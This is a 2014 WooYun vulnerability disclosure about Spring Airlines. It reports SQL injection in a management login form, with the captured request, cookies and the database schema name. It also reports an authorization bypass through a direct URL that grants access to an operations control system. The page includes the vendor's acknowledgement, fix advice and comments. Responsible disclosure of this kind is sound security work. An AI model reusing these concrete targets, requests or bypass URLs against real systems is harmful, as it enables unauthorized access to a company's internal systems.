春秋航空SQL注入+越权访问系统 | wooyun-2014-059314| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059314

漏洞标题：春秋航空SQL注入+越权访问系统

漏洞作者：小胖子

提交时间：2014-05-03 20:48

修复时间：2014-06-17 20:48

公开时间：2014-06-17 20:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-05-03：细节已通知厂商并且等待厂商处理中
2014-05-04：厂商已经确认，细节仅向厂商公开
2014-05-14：细节向核心白帽子及相关领域专家公开
2014-05-24：细节向普通白帽子公开
2014-06-03：细节向实习白帽子公开
2014-06-17：细节向公众公开

简要描述：

听说送飞机，我怎么可能不来，求飞机！飞机飞机打飞机！

详细说明：

漏洞1：SQL注入漏洞
漏洞系统：http://180.153.27.6/zc/ 域名是 http://www.air-spring.com/zc/
综合管理系统，登陆框存在注入，抓取登陆包：

POST /zc/loginquery.jsp HTTP/1.1
Host: www.air-spring.com
Proxy-Connection: keep-alive
Content-Length: 42
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: http://www.air-spring.com
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.66 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.air-spring.com/zc/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: BBOSSJSESSION=WNGnTkTQZt4CKdvHpStjG0wwrSLS1y7GPpGrnSr53Gs6Q2QhbW01!-1784026308; JSESSIONID=NL2XTkThfCRjyypMSKklbvL86ph9NShqSyhzpGwtGLZ33LF6QT09!-1784026308
action=query&username=ADMIN&password=admin

username存在注入

oracle数据库
当前数据库：
current schema (equivalent to database on Oracle): 'ZHONGHE'
拼音都拼错了有木有，综合是拼音是zonghe！！！！
由于可能涉及到其他敏感东西，我就不读表了，把飞机读下来了怎么办。
漏洞2：越权访问系统
URL: http://www.air-spring.com/sys/select.jsp?username=F10303
直接访问这个地址就可以成为登陆状态，点击下面的
运行控制系统（新）
就能成功进入运行控制系统

好多内容啊：

至于我是怎么找到这个地址的：问google吧。

漏洞证明：

见详细说明。

修复方案：

0x1：对登陆框的参数进行replace。
0x2：加上robots.txt限制搜索引擎抓取，加上每一个页面的权限控制代码。

版权声明：转载请注明来源小胖子@乌云

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-05-04 10:35

厂商回复：

已收到,我们将尽快修复，非常感谢，辛苦了。

漏洞评价：

2014-05-03 20:55 | 梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

小胖子出山了嘿咻
2014-05-03 21:18 | 魇 ( 普通白帽子 | Rank:1207 漏洞数:104 | 传闻中魇是一个惊世奇男子，但是除了他华...)

哈哈
2014-05-03 22:32 | 小胖子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)

@梧桐雨相濡以沫，不如
2014-05-03 22:35 | 梧桐雨 ( 核心白帽子 | Rank:1576 漏洞数:184 | 关注技术与网络安全)

@小胖子 - - 你还是苏杭的那个胖子么

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059314

漏洞标题：春秋航空SQL注入+越权访问系统

相关厂商：春秋航空

漏洞作者：小胖子

提交时间：2014-05-03 20:48

修复时间：2014-06-17 20:48

公开时间：2014-06-17 20:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源小胖子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-059314

漏洞标题：春秋航空SQL注入+越权访问系统

相关厂商：春秋航空

漏洞作者： 小胖子

提交时间：2014-05-03 20:48

修复时间：2014-06-17 20:48

公开时间：2014-06-17 20:48

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：15

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-059314"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 小胖子@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：小胖子

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源小胖子@乌云